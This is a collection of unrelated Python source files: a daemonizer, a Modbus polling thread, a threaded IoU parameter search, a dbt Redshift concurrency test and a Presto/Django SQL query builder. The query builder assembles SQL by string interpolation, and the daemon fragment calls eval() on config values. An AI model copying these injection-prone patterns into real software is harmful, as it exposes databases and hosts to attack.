command = config.get(device,'command')
rate = config.getfloat(device,'rate')
cmd = threading.Thread(target = shelldevice_thread, args = (device,command,rate))
cmd.setName("Thread_%s"%device)
cmd.setDaemon(True)
cmd.start()
for device in pydevices:
module = config.get(device,'module')
argument_list = eval(config.get(device,'args'))
#print argument_list
cmd = threading.Thread(target = pydevice_thread, args = (device,module,argument_list))
cmd.setName("Thread_%s"%device)
cmd.setDaemon(True)
cmd.start()
# endless loop
run = True
# server = xmlrpclib.Server('http://localhost:8002')
while run:
time.sleep(2)
try:
run = server.server_run()
except:
run = False
pass
# DAMONIZE from chris python page
#!/usr/bin/env python
###########################################################################
# configure UID and GID of server
UID = 501
GID = 501
# configure these paths:
LOGFILE = '/Users/markusro/Projects/DAMARISd/damarisd.log'
PIDFILE = '/Users/markusro/Projects/DAMARISd/damarisd.pid'
# and let USERPROG be the main function of your project
USERPROG = damarisd_daemon
###########################################################################
#based on Juergen Hermanns http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/66012
class Log:
"""file like for writes with auto flush after each write
to ensure that everything is logged, even during an
unexpected exit."""
def __init__(self, f):
self.f = f
def write(self, s):
self.f.write(s)
self.f.flush()
def main():
#change to data directory if needed
os.chdir("/Users/markusro/Projects/DAMARISd")
#redirect outputs to a logfile
sys.stdout = sys.stderr = Log(open(LOGFILE, 'a+'))
#ensure the that the daemon runs a normal user
#os.setegid(GID) #set group first "pydaemon"
#os.seteuid(UID) #set user "pydaemon"
#start the user program here:
USERPROG()
if __name__ == "__main__":
# do the UNIX double-fork magic, see Stevens' "Advanced
# Programming in the UNIX Environment" for details (ISBN 0201563177)
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
# decouple from parent environment
os.chdir("/") #don't prevent unmounting....
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent, print eventual PID before
print "Daemon PID %d" % pid
open(PIDFILE,'w').write("%d"%pid)
sys.exit(0)
print "Daemon PID %d" % pid
except OSError, e:
print >>sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
# start the daemon main loop
main()
|
modbus_thread.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# modbus_thread
# start a thread for polling a set of registers, display result on console
# exit with ctrl+c
import time
from threading import Thread, Lock
from pyModbusTCP.client import ModbusClient
SERVER_HOST = "localhost"
SERVER_PORT = 502
# set global
regs = []
# init a thread lock
regs_lock = Lock()
# modbus polling thread
def polling_thread():
global regs
c = ModbusClient(host=SERVER_HOST, port=SERVER_PORT)
# polling loop
while True:
# keep TCP open
if not c.is_open():
c.open()
# do modbus reading on socket
reg_list = c.read_holding_registers(0, 10)
# if read is ok, store result in regs (with thread lock synchronization)
if reg_list:
with regs_lock:
regs = list(reg_list)
# 1s before next polling
time.sleep(1)
# start polling thread
tp = Thread(target=polling_thread)
# set daemon: polling thread will exit if main thread exit
tp.daemon = True
tp.start()
# display loop (in main thread)
while True:
# print regs list (with thread lock synchronization)
with regs_lock:
print(regs)
# 1s before next print
time.sleep(1)
|
fit.py | #!/usr/bin/env python3
import itertools
import json
import random
from threading import Thread
from tqdm import tqdm, tnrange
from sword import morphology_map, where_da_sword
def iou(a, b, epsilon=1e-5):
# COORDINATES OF THE INTERSECTION BOX
x1 = max(a[0], b[0])
y1 = max(a[1], b[1])
x2 = min(a[2], b[2])
y2 = min(a[3], b[3])
# AREA OF OVERLAP - Area where the boxes intersect
width = (x2 - x1)
height = (y2 - y1)
# handle case where there is NO overlap
if (width < 0) or (height < 0):
return 0.0
area_overlap = width * height
# COMBINED AREA
area_a = (a[2] - a[0]) * (a[3] - a[1])
area_b = (b[2] - b[0]) * (b[3] - b[1])
area_combined = area_a + area_b - area_overlap
# RATIO OF AREA OF OVERLAP OVER COMBINED AREA
iou = area_overlap / (area_combined + epsilon)
return iou
def load_data(i):
data = []
with open("./train/out{0!s}.txt".format(i)) as f:
for line in f:
line = line.replace("\n", "")
line = line.replace("#", "-1")
line = line.split(";")
line = tuple(map(int, line))
data.append(line)
return data
def validate(j, params, iou_for_params):
expected = load_data(j)
iou_for_file = []
for i, frame in enumerate(where_da_sword("./train/in{0!s}.mp4".format(j), expected[0], params)):
iou_for_file.append(iou(expected[i], frame))
iou_for_params.append(sum(iou_for_file) / len(iou_for_file))
if __name__ == '__main__':
with open("config.json", "r") as f:
best_params = dict(json.load(f))
best_iou = []
threads = []
for j in range(1, 9, 1):
threads.append(
Thread(target=validate, args=(j, best_params, best_iou)))
for t in threads:
t.start()
for t in tqdm(threads):
t.join()
best_iou = sum(best_iou) / len(best_iou)
print("Best IoU: {0!s}".format(best_iou))
blur_kernel_size = [i for i in range(3, 6, 2)]
canny_threshold1 = [i for i in range(-1, 2, 1)]
canny_threshold2 = [i for i in range(-1, 2, 1)]
hough_rho = [i / 10000.0 for i in range(-100, 101, 10)]
hough_threshold = [i for i in range(-1, 2, 1)]
hough_minLineLength = [i for i in range(-1, 2, 1)]
hough_maxLineGap = [i for i in range(-1, 2, 1)]
morphology_method = [i for i in morphology_map.keys()]
morphology_kernel = [i for i in range(3, 8, 2)]
morphology_iter = [i for i in range(0, 3, 1)]
for _ in tqdm(range(10000)):
params = {
"deque_maxlen": best_params["deque_maxlen"],
"blur_kernel_size": random.choice(blur_kernel_size),
"canny_threshold1": best_params["canny_threshold1"] + random.choice(canny_threshold1),
"canny_threshold2": best_params["canny_threshold2"] + random.choice(canny_threshold2),
"hough_rho": best_params["hough_rho"] + random.choice(hough_rho),
"hough_threshold": best_params["hough_threshold"] + random.choice(hough_threshold),
"hough_minLineLength": best_params["hough_minLineLength"] + random.choice(hough_minLineLength),
"hough_maxLineGap": best_params["hough_maxLineGap"] + random.choice(hough_maxLineGap),
"morphology_method": best_params["morphology_method"],
"morphology_kernel": random.choice(morphology_kernel),
"morphology_iter": random.choice(morphology_iter)
}
# print(params["hough_maxLineGap"])
# print(params["hough_minLineLength"])
# print(params["hough_rho"])
# print(params["hough_threshold"])
threads = []
iou_for_params = []
for j in range(1, 9, 1):
threads.append(Thread(target=validate, args=(j, params, iou_for_params)))
for t in threads:
t.start()
for t in threads:
t.join()
iou_for_params = sum(
iou_for_params) / len(
iou_for_params)
if iou_for_params > best_iou:
best_params = params
best_iou = iou_for_params
print(
"Better IoU: {0!s}".format(
best_iou))
with open("config.json", "w") as f:
json.dump(best_params, f)
|
test_concurrent_transaction.py | from nose.plugins.attrib import attr
from test.integration.base import DBTIntegrationTest
import threading
class BaseTestConcurrentTransaction(DBTIntegrationTest):
def reset(self):
self.query_state = {
'view_model': 'wait',
'model_1': 'wait',
}
@property
def schema(self):
return "concurrent_transaction_032"
@property
def project_config(self):
return {
"macro-paths": ["test/integration/032_concurrent_transaction_test/macros"],
"on-run-start": [
"{{ create_udfs() }}",
],
}
def run_select_and_check(self, rel, sql):
try:
res = self.run_sql(sql, fetch='one')
# The result is the output of f_sleep(), which is True
if res[0] == True:
self.query_state[rel] = 'good'
else:
self.query_state[rel] = 'bad'
except Exception as e:
if 'concurrent transaction' in str(e):
self.query_state[rel] = 'error: {}'.format(e)
else:
self.query_state[rel] = 'error: {}'.format(e)
def async_select(self, rel, sleep=10):
# Run the select statement in a thread. When the query returns, the global
# query_state will be update with a state of good/bad/error, and the associated
# error will be reported if one was raised.
schema = self.unique_schema()
query = '''
-- async_select: {rel}
select {schema}.f_sleep({sleep}) from {schema}.{rel}
'''.format(
schema=schema,
sleep=sleep,
rel=rel)
thread = threading.Thread(target=lambda: self.run_select_and_check(rel, query))
thread.start()
return thread
def run_test(self):
self.use_profile("redshift")
# First run the project to make sure the models exist
results = self.run_dbt(args=['run'])
self.assertEqual(len(results), 2)
# Execute long-running queries in threads
t1 = self.async_select('view_model', 10)
t2 = self.async_select('model_1', 5)
# While the queries are executing, re-run the project
res = self.run_dbt(args=['run', '--threads', '8'])
self.assertEqual(len(res), 2)
# Finally, wait for these threads to finish
t1.join()
t2.join()
self.assertTrue(len(res) > 0)
# If the query succeeded, the global query_state should be 'good'
self.assertEqual(self.query_state['view_model'], 'good')
self.assertEqual(self.query_state['model_1'], 'good')
class TableTestConcurrentTransaction(BaseTestConcurrentTransaction):
@property
def models(self):
return "test/integration/032_concurrent_transaction_test/models-table"
@attr(type="redshift")
def test__redshift__concurrent_transaction_table(self):
self.reset()
self.run_test()
class ViewTestConcurrentTransaction(BaseTestConcurrentTransaction):
@property
def models(self):
return "test/integration/032_concurrent_transaction_test/models-view"
@attr(type="redshift")
def test__redshift__concurrent_transaction_view(self):
self.reset()
self.run_test()
class IncrementalTestConcurrentTransaction(BaseTestConcurrentTransaction):
@property
def models(self):
return "test/integration/032_concurrent_transaction_test/models-incremental"
@attr(type="redshift")
def test__redshift__concurrent_transaction_incremental(self):
self.reset()
self.run_test()
|
presto.py | import re
from collections import OrderedDict
import prestodb
from query_designer.models import Query
import time
from threading import Thread
import sys
from django.db import connections, ProgrammingError
from django.conf import settings
from aggregator.models import Variable, Dimension
from .utils import GRANULARITY_MIN_PAGES, ResultEncoder
def process(self, dimension_values='', variable='', only_headers=False, commit=True, execute=False, raw_query=False, from_visualizer=False):
dimension_values = preprocess_dimension_values(dimension_values)
selects = OrderedDict()
headers = []
header_sql_types = []
columns = []
groups = []
prejoin_groups = []
c_name, v_obj, data_table_names, groups = preprocess_document(columns, groups, prejoin_groups,
header_sql_types, headers, selects, self)
# import pdb
# pdb.set_trace()
prejoin_name = None
if len(self.document['from']) > 1:
prejoin_name = extract_prejoin_name(self.document['from'])
if is_query_with_aggregate(self.document['from']) and prejoin_name is not None:
limit, query, subquery_cnt = build_prejoin_query(prejoin_name, columns,
prejoin_groups, self)
else:
limit, query, subquery_cnt = build_query(c_name, columns, groups, selects, self)
# if for map visualisation, do not perform round on select, but choose min
print 'trying to remove round'
if from_visualizer:
query = remove_round_from_select(query)
print 'removed round'
cursor = choose_db_cursor(v_obj)
if not only_headers:
# execute query & return results
t1 = time.time()
pages = {
'current': 1,
'total': 1
}
def _count():
pass
# cursor.execute(subquery_cnt)
# self.count = cursor.fetchone()[0]
self.count = None
count_failed = False
# t = Thread(target=_count, args=[])
# t.start()
# t.join(timeout=5)
# if self.count is None:
# count_failed = True
# self.count = 10000000
#
# if limit is not None:
# pages['total'] = (self.count - 1) / limit + 1
# apply granularity
if self.count >= GRANULARITY_MIN_PAGES and (not count_failed):
try:
granularity = int(self.document.get('granularity', 0))
except ValueError:
granularity = 0
if granularity > 1:
query = """
SELECT %s FROM (
SELECT row_number() OVER () AS row_id, * FROM (%s) AS GQ
) AS GQ_C
WHERE (row_id %% %d = 0)
""" % (','.join([c[1] for c in columns]), query, granularity)
print "Executed query:"
print query
results = []
if execute:
cursor.execute(query)
try:
all_rows = cursor.fetchall()
except Exception, e:
if e.message.find('exceeded') >= 0:
print 'MAX MEMORY EXCEEDED'
raise Exception('max_memory_exceeded')
else:
print e.message
print 'other error'
raise Exception('error')
print "First rows"
print all_rows[:3]
print header_sql_types
results = all_rows
# include dimension values if requested
for d_name in dimension_values:
hdx, header = [hi for hi in enumerate(headers) if hi[1]['name'] == d_name][0]
d = Dimension.objects.get(pk=selects[d_name]['column'].split('_')[-1])
if not d.non_filterable:
header['values'] = d.values
# include variable ranges if requested
if variable:
vdx, v = [vi for vi in enumerate(headers) if vi[1]['name'] == variable][0]
v['distribution'] = Variable.objects.get(pk=selects[variable]['table'].split('_')[-1]).distribution
if not only_headers:
# monitor query duration
q_time = (time.time() - t1) * 1000
if not only_headers:
response = {
'results': results,
'headers': {
'runtime_msec': q_time,
# 'pages': pages,
}
}
else:
response = {'headers': {}}
response['headers']['columns'] = headers
if raw_query:
response['raw_query'] = query
# store headers
self.headers = ResultEncoder(mode='postgres').encode(headers)
if self.pk and commit:
self.save()
return response
def preprocess_dimension_values(dimension_values):
if dimension_values:
dimension_values = dimension_values.split(',')
else:
dimension_values = []
return dimension_values
def preprocess_document(columns, groups, prejoin_groups, header_sql_types, headers, selects, self):
data_table_names = []
for _from in self.document['from']:
v_obj = Variable.objects.get(pk=_from['type'])
for s in _from['select']:
if s['type'] != 'VALUE':
human_column_name = Dimension.objects.get(pk=s['type']).title
print human_column_name
dimension = Dimension.objects.get(pk=s['type'])
column_name = dimension.data_column_name
column_unit = dimension.unit
column_axis = dimension.axis
column_step = dimension.step
sql_type = dimension.sql_type
else:
human_column_name = Variable.objects.get(pk=_from['type']).title
print human_column_name
if v_obj.dataset.stored_at == 'UBITECH_PRESTO':
column_name = v_obj.name
else:
column_name = 'value'
column_unit = v_obj.unit
column_axis = None
column_step = None
sql_type = 'double precision'
selects[s['name']] = {'column': column_name, 'table': v_obj.data_table_name}
_from['name'] = v_obj.data_table_name
# if 'joined' not in s:
c_name = '%s.%s' % (_from['name'], selects[s['name']]['column'])
if s.get('aggregate', '') != '':
c_name_with_agg = '%s(%s)' % (s.get('aggregate'), c_name)
if str(s.get('aggregate')).startswith('date_trunc'):
human_column_name_with_agg = '%s(%s)' % (str(s.get('aggregate')).split('date_trunc_')[1], human_column_name)
elif str(s.get('aggregate')).startswith('round0'):
human_column_name_with_agg = '%s\n(%s)' % (human_column_name, 'resolution 1 deg')
elif str(s.get('aggregate')).startswith('round1'):
human_column_name_with_agg = '%s\n(%s)' % (human_column_name, 'resolution 0.1 deg')
elif str(s.get('aggregate')).startswith('round2'):
human_column_name_with_agg = '%s\n(%s)' % (human_column_name, 'resolution 0.01 deg')
else:
human_column_name_with_agg = '%s(%s)' % (str(s.get('aggregate')), human_column_name)
else:
c_name_with_agg = c_name
human_column_name_with_agg = human_column_name
if not s.get('exclude', False):
header_sql_types.append(sql_type)
headers.append({
'title': human_column_name_with_agg.lower().title(),
'name': s['name'],
'unit': column_unit,
'step': column_step,
'quote': '' if sql_type.startswith('numeric') or sql_type.startswith('double') else "'",
'isVariable': s['type'] == 'VALUE',
'axis': column_axis,
})
# add fields to select clause
columns.append((c_name_with_agg, '%s' % s['name'], '%s' % s['title'], s.get('aggregate')))
# add fields to grouping
if s.get('groupBy', False):
if str(s.get('aggregate', '')).startswith('round') or str(s.get('aggregate', '')).startswith('date'):
groups.append(c_name_with_agg)
prejoin_groups.append('%s(%s)' % (s.get('aggregate'), selects[s['name']]['column']))
else:
groups.append(c_name)
prejoin_groups.append('%s' % (selects[s['name']]['column']))
data_table_names.append(v_obj.data_table_name)
groups = list(set(groups))
return c_name_with_agg, v_obj, data_table_names, groups
def is_query_with_aggregate(from_list):
for _from in from_list:
for s in _from['select']:
if 'type' in s and s['type'] == 'VALUE' and s['aggregate'] == '':
return False
return True
def remove_round_from_select(q):
select_clause = q.split('(SELECT')[1].split('FROM')[0].replace('round(', 'MIN(').replace(', 0', '').replace(', 1', '').replace(', 2', '')
return q.split('(SELECT')[0] + '(SELECT' + select_clause + 'FROM' + q.split('(SELECT')[1].split('FROM')[1]
def extract_prejoin_name(from_list):
dataset_list = []
for f in from_list:
dataset_list.append(Variable.objects.get(pk=int(f['type'])).dataset.id)
dataset_list = list(set(dataset_list))
if len(dataset_list) > 1:
return extract_prejoin_name_for_datasets(dataset_list[0], dataset_list[1])
else:
return None
def build_prejoin_query(prejoin_name, columns, prejoin_groups, self):
select_clause = build_prejoin_select_clause(columns)
from_clause = 'FROM ' + prejoin_name + '\n'
where_clause = build_prejoin_where_clause(self, prejoin_name)
group_clause = build_group_by_clause(prejoin_groups)
order_by_clause = build_order_by_clause(self)
limit, limit_clause = build_limit_clause(self)
subquery = 'SELECT * FROM (' + select_clause + from_clause + where_clause + group_clause + order_by_clause + ') AS SQ1\n'
q = subquery + limit_clause
subquery_cnt = 'SELECT COUNT(*) FROM (' + q + ') AS SQ1\n'
print 'Initial Query:'
print subquery
q, subquery, subquery_cnt = fix_round(q, subquery, subquery_cnt)
q = fix_date_trunc(q, subquery, subquery_cnt)
return limit, q, subquery_cnt
def build_query(c_name, columns, groups, selects, self):
select_clause = build_select_clause(columns)
from_clause = build_from_clause(selects)
all_joins_for_check, join_clause, needs_join_reorder = build_join_clause(c_name, selects, self)
if not is_same_range_joins(all_joins_for_check):
raise ValueError("Datasets have columns in common but actually nothing to join (ranges with nothing in common)")
where_clause = build_where_clause(self)
group_clause = build_group_by_clause(groups)
order_by_clause = build_order_by_clause(self)
limit, limit_clause = build_limit_clause(self)
if needs_join_reorder:
table1 = from_clause.split('FROM ')[1].strip()
table2 = join_clause.split('JOIN ')[1].split('ON')[0].strip()
from_clause = from_clause.replace(table1, table2)
join_clause = join_clause.split('ON')[0].replace(table2, table1) + ' ON ' + join_clause.split('ON')[1]
# organize into subquery
subquery = 'SELECT * FROM (' + select_clause + from_clause + join_clause + where_clause + group_clause + order_by_clause + ') AS SQ1\n'
q = subquery + limit_clause
subquery_cnt = 'SELECT COUNT(*) FROM (' + q + ') AS SQ1\n'
print 'Initial Query:'
print subquery
q, subquery, subquery_cnt = fix_round(q, subquery, subquery_cnt)
q = fix_date_trunc(q, subquery, subquery_cnt)
return limit, q, subquery_cnt
def choose_db_cursor(v_obj):
if v_obj.dataset.stored_at == 'UBITECH_PRESTO':
presto_credentials = settings.DATABASES['UBITECH_PRESTO']
conn = prestodb.dbapi.connect(
host=presto_credentials['HOST'],
port=presto_credentials['PORT'],
user=presto_credentials['USER'],
catalog=presto_credentials['CATALOG'],
schema=presto_credentials['SCHEMA'],
)
cursor = conn.cursor()
else:
cursor = connections['default'].cursor()
return cursor
def extract_prejoin_name_for_datasets(dataset_id1, dataset_id2):
query = """SELECT view_name
FROM aggregator_joinofdatasets
WHERE (dataset_first_id =%s AND dataset_second_id = %s) OR
(dataset_first_id = %s AND dataset_second_id = %s) """ \
% (dataset_id1, dataset_id2, dataset_id2, dataset_id1)
cursor = connections['default'].cursor()
try:
cursor.execute(query)
except ProgrammingError as e:
print "query execution failed due to: ", e
return None
res = cursor.fetchone()
if res is not None:
return res[0]
return None
def translate_percentiles_if_needed(select_clause):
if not 'PERCENTILE_CONT' in select_clause:
return select_clause
else:
return translate_percentiles(select_clause)
def translate_percentiles(select_clause):
select_table = select_clause.split('(')
func = select_table[0]
params = select_table[1]
percentage = int(func.split('_')[2])
percentage_float = percentage / 100.0
func = 'APPROX_PERCENTILE'
params_table = params.split(')')
return func + '(' + params_table[0] + ', ' + str(percentage_float) + ')'
def build_select_clause(columns):
select_clause = 'SELECT ' + ','.join(['%s AS %s' %
(translate_percentiles_if_needed(c[0]), c[1]) for c in columns]) + '\n'
return select_clause
def build_prejoin_select_clause(columns):
import re
select_clause = 'SELECT ' + ','.join(['%s AS %s' % (re.sub("[(].*[.]", "(", c[0]), c[1]) for c in columns]) + '\n'
return select_clause
def build_from_clause(selects):
from_clause = 'FROM %s \n' % \
(selects[selects.keys()[0]]['table'])
return from_clause
def build_join_clause(c_name, selects, self):
join_clause = ''
all_joins_for_check = []
tables_in_query = set()
tables_in_query.add(selects[self.document['from'][0]['select'][0]['name']]['table'])
join_from_index = -1
needs_join_reorder = False
for idx, _from in enumerate(self.document['from'][1:], 1):
joins = []
joins_for_check = []
for s in _from['select']:
if 'joined' in s:
if s['name'].endswith('location_latitude'):
js = [
(s['name'], s['joined'] + '_latitude'),
(s['name'].replace('_latitude', '_longitude'), s['joined'] + '_longitude'),
]
elif s['name'].endswith('location_longitude'):
js = []
else:
js = [(s['name'], s['joined'])]
for j in js:
joins_for_check.append(((_from['type'], selects[j[0]]['column']),
(self.document['from'][0]['type'], selects[j[1]]['column'])))
if s.get('aggregate', '') != '':
c_name = '%s(%s)' % (s.get('aggregate'), c_name)
joins.append('%s(%s.%s)=%s(%s.%s)' %
(s.get('aggregate'),
_from['name'],
selects[j[0]]['column'],
s.get('aggregate'),
self.document['from'][0]['name'],
selects[j[1]]['column']))
else:
joins.append('%s.%s=%s.%s' %
(_from['name'],
selects[j[0]]['column'],
self.document['from'][0]['name'],
selects[j[1]]['column']))
print "LOOK FOR JOIN"
print selects
print _from['name']
print tables_in_query
if selects[_from['select'][0]['name']]['table'] not in tables_in_query:
tables_in_query.add(selects[_from['select'][0]['name']]['table'])
print "WE HAVE JOIN"
join_from_index = idx
join_clause += 'JOIN %s ON %s\n' % \
(selects[_from['select'][0]['name']]['table'],
' AND '.join(joins))
if join_clause.replace(" ", "").replace("\n", "").replace(",", "").endswith("ON"):
raise ValueError("No common columns for all the datasets. They cannot be combined.")
all_joins_for_check.append(joins_for_check)
if join_clause != '':
print 'join_clause is not empty'
dataset1 = Variable.objects.get(pk=int(self.document['from'][0]['type'])).dataset
dataset2 = Variable.objects.get(pk=int(self.document['from'][join_from_index]['type'])).dataset
print long(dataset1.number_of_rows) , long(dataset2.number_of_rows)
if long(dataset2.number_of_rows) > long(dataset1.number_of_rows):
print 'needs reorder'
needs_join_reorder = True
print "Joins to check"
print all_joins_for_check
if not is_same_range_joins(all_joins_for_check):
print "Datasets have columns in common but actually nothing to join (ranges with nothing in common)"
raise ValueError("Datasets do not match both in space and time. They cannot be combined.")
print "Query Continues"
# where
return all_joins_for_check, join_clause, needs_join_reorder
def build_where_clause(self):
filters = self.document.get('filters', '')
if not filters:
where_clause = ''
else:
where_clause = self.process_filters(filters, 'presto', use_table_names=True)
extra_filters = ''
for f in self.document['from']:
table_name = Variable.objects.get(pk=int(f['type'])).dataset.table_name
col_name = Variable.objects.get(pk=int(f['type'])).name
if extra_filters == '':
extra_filters += table_name + '.' + col_name + ' is not NULL'
else:
extra_filters += ' OR ' + table_name + '.' + col_name + ' is not NULL'
if where_clause:
where_clause = 'WHERE ' + where_clause + ' AND (' + extra_filters + ') \n'
else:
where_clause = 'WHERE ' + extra_filters + ' \n'
return where_clause
def process_prejoin_filters(filters_json, self, view_name):
if type(filters_json) in [int, float]:
try:
filters = process_prejoin_leaf_filters(filters_json, self, view_name)
except:
return filters_json
return filters
if type(filters_json) in [str, unicode]:
try:
filters = process_prejoin_leaf_filters(filters_json, self, view_name)
except:
return filters_json
return "%s" % filters
_a = process_prejoin_filters(filters_json['a'], self, view_name)
_b = process_prejoin_filters(filters_json['b'], self, view_name)
result = '%s %s %s' % \
(('(%s)' % _a) if type(_a) not in [str, unicode, int, float] else _a,
Query.operator_to_str(filters_json['op']),
('(%s)' % _b) if type(_b) not in [str, unicode, int, float] else _b)
return result
def process_prejoin_leaf_filters(filters, self, view_name):
col_name = ''
from_order = int(filters[filters.find('i') + 1:filters.find('_')])
if from_order >= 0:
for x in self.document['from'][from_order]['select']:
if x['name'] == filters:
if x['type'] != 'VALUE':
col_name = Dimension.objects.get(pk=x['type']).data_column_name
else:
v_obj = Variable.objects.get(pk=int(self.document['from'][from_order]['type']))
if v_obj.dataset.stored_at == 'UBITECH_PRESTO':
col_name = v_obj.name
else:
col_name = 'value'
filters = view_name + '.' + col_name
return filters
def build_prejoin_where_clause(self, view_name):
filters = self.document.get('filters', '')
if not filters:
where_clause = ''
else:
where_clause = self.process_filters(filters, mode='presto', use_table_names = False)
extra_filters = ''
for f in self.document['from']:
table_name = Variable.objects.get(pk=int(f['type'])).dataset.table_name
col_name = Variable.objects.get(pk=int(f['type'])).name
if extra_filters == '':
extra_filters += col_name + ' is not NULL'
else:
extra_filters += ' OR ' + col_name + ' is not NULL'
if where_clause:
where_clause = 'WHERE ' + where_clause + ' AND (' + extra_filters + ') \n'
else:
where_clause = 'WHERE ' + extra_filters + ' \n'
return where_clause
def build_group_by_clause(groups):
group_clause = ''
if groups:
group_clause = 'GROUP BY %s\n' % ','.join(groups)
return group_clause
def build_order_by_clause(self):
order_by_clause = ''
orderings = self.document.get('orderings', [])
if orderings:
order_by_clause = 'ORDER BY %s\n' % ','.join([(o['name'] + ' ' + o['type']) for o in orderings])
return order_by_clause
def build_limit_clause(self):
limit_clause = ''
limit = None
if 'limit' in self.document and self.document['limit']:
limit = int(self.document['limit'])
limit_clause = 'LIMIT %d\n' % limit
return limit, limit_clause
def fix_date_trunc(q, subquery, subquery_cnt):
if len(re.findall(r'date_trunc_(.*?)', subquery)) > 0:
print 'Trying to fix date_trunc'
time_trunc = str(subquery.split('date_trunc_')[1].split('(')[0])
# print
names = re.findall(r"date_trunc_" + time_trunc + "\((.*?)\)", subquery)
for name in names:
subquery = re.sub(r"date_trunc_" + time_trunc + "\((" + name + ")\)",
"date_trunc('" + time_trunc + "', " + name + ")", subquery)
# print subquery
names = re.findall(r"date_trunc_" + time_trunc + "\((.*?)\)", subquery_cnt)
for name in names:
subquery_cnt = re.sub(r"date_trunc_" + time_trunc + "\((" + name + ")\)",
"date_trunc('" + time_trunc + "', " + name + ")", subquery_cnt)
# print subquery_cnt
names = re.findall(r"date_trunc_" + time_trunc + "\((.*?)\)", q)
for name in names:
q = re.sub(r"date_trunc_" + time_trunc + "\((" + name + ")\)",
"date_trunc('" + time_trunc + "', " + name + ")", q)
# print q
print 'looking for COUNTdistinctdate_trunc'
if str(q).find('COUNTdistinctdate_trunc') > -1:
q = q.split('COUNTdistinctdate_trunc')[0] + 'COUNT(DISTINCT date_trunc' + q.split('COUNTdistinctdate_trunc')[1].split(')', 1)[0] + '))' + q.split('COUNTdistinctdate_trunc')[1].split(')', 1)[1]
print 'done COUNTdistinctdate_trunc'
return q
def fix_round(q, subquery, subquery_cnt):
if len(re.findall(r'round\d', subquery)) > 0:
print 'Trying to fix round'
# round_num = str(subquery.split('round')[1][0])
for occurance in set(re.findall(r'round\d', subquery)):
round_num = str(occurance)[-1]
print round_num
# names = re.findall(r"round" + round_num + "\((.*?)\)", subquery)
# print
names = re.findall(r"round" + round_num + "\((.*?)\)", subquery)
for name in names:
subquery = re.sub(r"round" + round_num + "\((" + name + ")\)",
"round(" + name + ", " + round_num + ")", subquery)
# print subquery
names = re.findall(r"round" + round_num + "\((.*?)\)", subquery_cnt)
for name in names:
subquery_cnt = re.sub(r"round" + round_num + "\((" + name + ")\)",
"round(" + name + ", " + round_num + ")", subquery_cnt)
# print subquery_cnt
names = re.findall(r"round" + round_num + "\((.*?)\)", q)
for name in names:
q = re.sub(r"round" + round_num + "\((" + name + ")\)",
"round(" + name + ", " + round_num + ")", q)
# print q
return q, subquery, subquery_cnt
def extract_variable_ids_from_doc(from_list):
variable_list = []
for _from in from_list:
variable_list.append(_from['type'])
return variable_list[0], variable_list[1]
def extract_dataset_id_from_varible_ids(variable_id):
query = """SELECT dataset_id
FROM aggregator_variable
WHERE id =%s """ % variable_id
cursor = connections['default'].cursor()
try:
cursor.execute(query)
except ProgrammingError as e:
print "query execution failed due to: ", e
return None
res = cursor.fetchone()
return res[0]
def is_same_range_joins(join_list):
join_chain_list = create_join_chain_list_from_joins(join_list)
print 'join_chain_list'
print join_chain_list
min_max_list = calculate_range_for_every_join_chain(join_chain_list)
print 'min_max_list'
print min_max_list
return is_valid_range_all_chains(min_max_list)
def create_join_chain_list_from_joins(join_list):
all_joins_list, chained_dimensions, join_chain_list, list_accessed_counter = init_variables(join_list)
for join in all_joins_list:
if not (chained_dimensions.__contains__(join[0]) and chained_dimensions.__contains__(join[1])):
chain_list = update_chain_join_list(join)
update_chained_dimensions(chained_dimensions, join)
add_joins_to_chain_if_exist(all_joins_list, chain_list, chained_dimensions, list_accessed_counter)
join_chain_list.append(chain_list)
list_accessed_counter += 1
return join_chain_list
def calculate_range_for_every_join_chain(join_chain_list):
min_max_dim_chain_list = []
for join_chain in join_chain_list:
min_max_dim_list = []
for dim in join_chain:
min_dim, max_dim = get_min_max_dimension(dim)
min_max_dim_list.append((min_dim, max_dim))
min_max_dim_chain_list.append(min_max_dim_list)
# print(min_max_dim_chain_list)
return min_max_dim_chain_list
def is_valid_range_all_chains(min_max_chain_list):
for chain in min_max_chain_list:
if not is_valid_range_for_chain(chain):
return False
return True
def init_variables(join_list):
join_chain_list = []
chained_dimensions = []
all_joins_list = extract_all_joins_from_join_list(join_list)
list_accessed_counter = 0
return all_joins_list, chained_dimensions, join_chain_list, list_accessed_counter
def update_chain_join_list(join):
chain_list = [join[0], join[1]]
return chain_list
def update_chained_dimensions(chained_dimensions, join):
chained_dimensions.append(join[0])
chained_dimensions.append(join[1])
def add_joins_to_chain_if_exist(all_joins_list, chain_list, chained_dimensions, list_accessed_counter):
list_size = len(all_joins_list)
for join2 in all_joins_list[list_accessed_counter:list_size]:
add_join_if_valid(chain_list, chained_dimensions, join2)
def get_min_max_dimension(dim):
# cursor = connections['default'].cursor()
# min_max_dim_query = build_min_max_dimension_query(dim)
# try:
# cursor.execute(min_max_dim_query)
# except ProgrammingError as e:
# print "query execution failed due to: ", e
# return None
# res = cursor.fetchone()
res = None
try:
min = Variable.objects.get(pk=int(dim[0])).dimensions.get(name=dim[1]).min
max = Variable.objects.get(pk=int(dim[0])).dimensions.get(name=dim[1]).max
if min is not None and max is not None:
res = (min, max)
except:
pass
if res is not None:
return res[0], res[1]
else:
return (-1 * sys.maxint), sys.maxint
def build_min_max_dimension_query(dim):
min_max_dim_query = """
SELECT
min,
max
FROM aggregator_dimension d
INNER JOIN aggregator_variable v
ON d.variable_id = v.id
WHERE d.title = '%s' AND variable_id = %s
""" % (dim[1], dim[0])
return min_max_dim_query
def is_valid_range_for_chain(chain):
max_of_mins, min_of_maxes = initialize_minofmaxes_and_maxofmins(chain)
if min_of_maxes is None or max_of_mins is None:
return True
for dim in chain:
if dim[0] is not None and dim[0] > max_of_mins:
max_of_mins = dim[0]
if dim[1] is not None and dim[1] < min_of_maxes:
min_of_maxes = dim[1]
if min_of_maxes < max_of_mins:
return False
return True
def add_join_if_valid(chain_list, chained_dimensions, join2):
if join2[0] in chain_list and join2[1] not in chain_list:
chain_list.append(join2[1])
chained_dimensions.append(join2[1])
elif join2[1] in chain_list and join2[0] not in chain_list:
chain_list.append(join2[0])
